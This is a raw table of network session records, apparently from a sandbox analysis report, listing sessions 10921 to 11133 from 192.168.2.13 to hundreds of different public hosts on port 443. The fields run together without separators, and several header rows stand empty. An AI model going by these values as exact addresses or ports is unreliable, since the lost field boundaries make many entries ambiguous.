                                                  10921192.168.2.1334458154.6.41.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10922192.168.2.1359982212.40.176.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10923192.168.2.134115848.249.9.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10924192.168.2.1336648113.92.244.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10925192.168.2.1351742217.109.89.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10926192.168.2.133973642.118.128.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10927192.168.2.135715639.102.104.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10928192.168.2.13493504.65.67.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10929192.168.2.1334556199.147.119.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10930192.168.2.1353788124.203.182.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10931192.168.2.1345818219.214.91.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10932192.168.2.1339076191.27.146.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10933192.168.2.1357570179.88.188.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10934192.168.2.133751618.195.142.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10935192.168.2.135173485.213.253.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10936192.168.2.135838839.70.60.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10937192.168.2.1348904221.27.146.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10938192.168.2.1342370106.239.35.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10939192.168.2.134962263.163.122.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10940192.168.2.1352936154.17.31.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10941192.168.2.135403884.229.105.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10942192.168.2.134446035.2.158.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10943192.168.2.1354142211.220.196.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10944192.168.2.1336914206.75.238.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10945192.168.2.135006086.177.133.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10946192.168.2.1354112200.236.195.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10947192.168.2.1339698146.47.108.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10948192.168.2.1351902129.212.84.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10949192.168.2.135311620.183.175.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10950192.168.2.1333328112.139.194.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10951192.168.2.1345866108.20.106.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10952192.168.2.1342594221.245.0.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10953192.168.2.1337442155.232.89.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10954192.168.2.1354970170.99.76.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10955192.168.2.1338666172.191.55.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10956192.168.2.1356590183.161.238.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10957192.168.2.136040046.182.46.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10958192.168.2.1351200179.142.102.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10959192.168.2.1357974192.85.119.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10960192.168.2.1339916155.227.188.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10961192.168.2.1336510143.153.236.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10962192.168.2.1337760121.93.139.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10963192.168.2.134430465.23.23.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10964192.168.2.1354494123.153.16.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10965192.168.2.1340054197.189.237.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10966192.168.2.1353632138.116.226.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10967192.168.2.136014291.56.228.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10968192.168.2.1334618125.156.245.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10969192.168.2.1342156133.158.47.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10970192.168.2.1360460120.16.64.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10971192.168.2.1353192101.62.103.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10972192.168.2.1342618115.107.38.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10973192.168.2.1352704105.16.80.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10974192.168.2.1355844113.134.157.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10975192.168.2.134545885.245.136.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10976192.168.2.133525437.173.118.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10977192.168.2.1335144172.63.18.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10978192.168.2.1346754136.106.245.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10979192.168.2.1335204119.211.138.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10980192.168.2.1350428211.141.205.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10981192.168.2.1333298205.35.207.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10982192.168.2.1354196179.247.98.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10983192.168.2.1351918189.188.206.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10984192.168.2.1346666149.223.203.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10985192.168.2.1334580206.200.185.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10986192.168.2.1356686196.159.171.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10987192.168.2.1350574125.206.171.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10988192.168.2.135550069.18.31.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10989192.168.2.1333772155.243.34.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10990192.168.2.1355876130.183.74.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10991192.168.2.1334372153.185.48.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10992192.168.2.1334466181.209.188.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10993192.168.2.1348628163.171.213.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10994192.168.2.1342762212.248.223.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10995192.168.2.135337468.24.158.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10996192.168.2.134634268.160.147.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10997192.168.2.1358078196.118.162.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10998192.168.2.1359816220.123.22.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10999192.168.2.1354002193.118.145.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11000192.168.2.134929042.4.77.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11001192.168.2.1342116194.185.57.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11002192.168.2.134654068.128.181.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11003192.168.2.13381048.187.75.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11004192.168.2.134902843.147.140.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11005192.168.2.1341726131.130.231.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11006192.168.2.135552814.87.240.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11007192.168.2.134765620.1.72.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11008192.168.2.1343638209.12.21.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11009192.168.2.1346236140.12.137.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11010192.168.2.1345376156.202.64.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11011192.168.2.1345476195.1.28.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11012192.168.2.1335998216.126.238.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11013192.168.2.134857474.48.128.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11014192.168.2.1336820136.100.194.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11015192.168.2.1360024205.53.120.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11016192.168.2.133973635.152.156.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11017192.168.2.133677876.198.73.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11018192.168.2.134105650.156.141.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11019192.168.2.1343440194.9.182.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11020192.168.2.1343668162.99.27.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11021192.168.2.135188619.3.157.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11022192.168.2.135168632.193.192.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11023192.168.2.1334162105.73.251.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11024192.168.2.135852866.124.209.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11025192.168.2.135003857.140.86.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11026192.168.2.1340732147.118.9.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11027192.168.2.1340186156.185.26.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11028192.168.2.1344800131.83.53.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11029192.168.2.1339610135.61.69.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11030192.168.2.135538854.50.1.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11031192.168.2.1345004102.155.0.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11032192.168.2.1356206146.211.197.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11033192.168.2.134342465.187.164.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11034192.168.2.1360464128.129.150.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11035192.168.2.1359720190.188.192.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11036192.168.2.1348568189.102.251.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11037192.168.2.1351508130.51.218.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11038192.168.2.1337662171.161.3.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11039192.168.2.134713270.235.61.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11040192.168.2.134728688.237.201.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11041192.168.2.1350966118.146.226.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11042192.168.2.1349186105.124.116.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11043192.168.2.1356734167.79.43.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11044192.168.2.1342670193.221.47.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11045192.168.2.134962467.70.121.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11046192.168.2.1355526138.244.162.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11047192.168.2.134050054.239.253.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11048192.168.2.1350518156.110.72.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11049192.168.2.1337142172.66.27.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11050192.168.2.1349588138.28.54.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11051192.168.2.1349068138.58.27.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11052192.168.2.1343526112.59.200.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11053192.168.2.133815650.224.3.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11054192.168.2.1347402188.108.74.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11055192.168.2.1356324201.176.171.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11056192.168.2.1348382151.159.170.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11057192.168.2.1334816128.217.237.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11058192.168.2.135501695.229.49.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11059192.168.2.1355718115.103.49.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11060192.168.2.134962032.250.107.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11061192.168.2.134583043.116.53.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11062192.168.2.1338500212.81.122.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11063192.168.2.1345798106.93.146.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11064192.168.2.1338024101.41.138.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11065192.168.2.1333198208.84.29.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11066192.168.2.1350498148.208.8.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11067192.168.2.133512432.143.98.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11068192.168.2.1341950144.152.67.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11069192.168.2.133486058.146.28.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11070192.168.2.134289613.201.4.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11071192.168.2.134696883.77.135.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11072192.168.2.1340590203.70.216.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11073192.168.2.133376814.152.110.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11074192.168.2.133610281.250.31.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11075192.168.2.1354978157.148.158.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11076192.168.2.134232677.49.235.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11077192.168.2.1348124157.16.109.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11078192.168.2.13578164.21.45.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11079192.168.2.135986657.117.162.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11080192.168.2.1342238213.115.14.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11081192.168.2.133889696.246.119.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11082192.168.2.135311844.103.48.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11083192.168.2.1338280183.184.117.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11084192.168.2.134554265.101.220.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11085192.168.2.134578058.68.115.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11086192.168.2.13349228.132.21.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11087192.168.2.135027627.74.125.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11088192.168.2.1339370101.108.178.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11089192.168.2.134961239.46.7.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11090192.168.2.135507082.95.94.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11091192.168.2.1354690107.23.229.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11092192.168.2.1349520124.201.14.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11093192.168.2.1336634178.152.90.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11094192.168.2.1344192205.154.118.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11095192.168.2.1335170207.53.1.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11096192.168.2.135766059.159.134.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11097192.168.2.1357046147.10.168.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11098192.168.2.13505844.218.80.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11099192.168.2.1345200151.226.50.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11100192.168.2.134297098.24.62.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11101192.168.2.134481253.126.209.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11102192.168.2.1347236167.240.216.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11103192.168.2.1352490149.242.25.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11104192.168.2.1354434106.10.173.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11105192.168.2.13537564.253.93.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11106192.168.2.134202079.137.199.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11107192.168.2.1342126135.194.38.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11108192.168.2.1336300163.142.222.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11109192.168.2.1353210108.163.28.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11110192.168.2.1360200100.133.193.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11111192.168.2.134274896.66.106.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11112192.168.2.134836486.51.46.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11113192.168.2.133334632.1.206.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11114192.168.2.1335254176.252.78.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11115192.168.2.1341472222.80.47.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11116192.168.2.134856644.183.140.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11117192.168.2.1354600164.20.152.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11118192.168.2.135467035.146.23.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11119192.168.2.134724265.28.6.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11120192.168.2.1335878195.213.244.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11121192.168.2.134324684.99.185.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11122192.168.2.1353536178.114.163.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11123192.168.2.1351846210.240.19.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11124192.168.2.1354504218.150.13.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11125192.168.2.1340884207.128.178.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11126192.168.2.1349728108.121.19.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11127192.168.2.135121671.150.55.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11128192.168.2.133487482.95.239.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11129192.168.2.1345610188.241.247.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11130192.168.2.134227240.5.173.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11131192.168.2.1340872115.184.21.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11132192.168.2.1346886144.234.112.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11133192.168.2.1344558223.64.170.254443
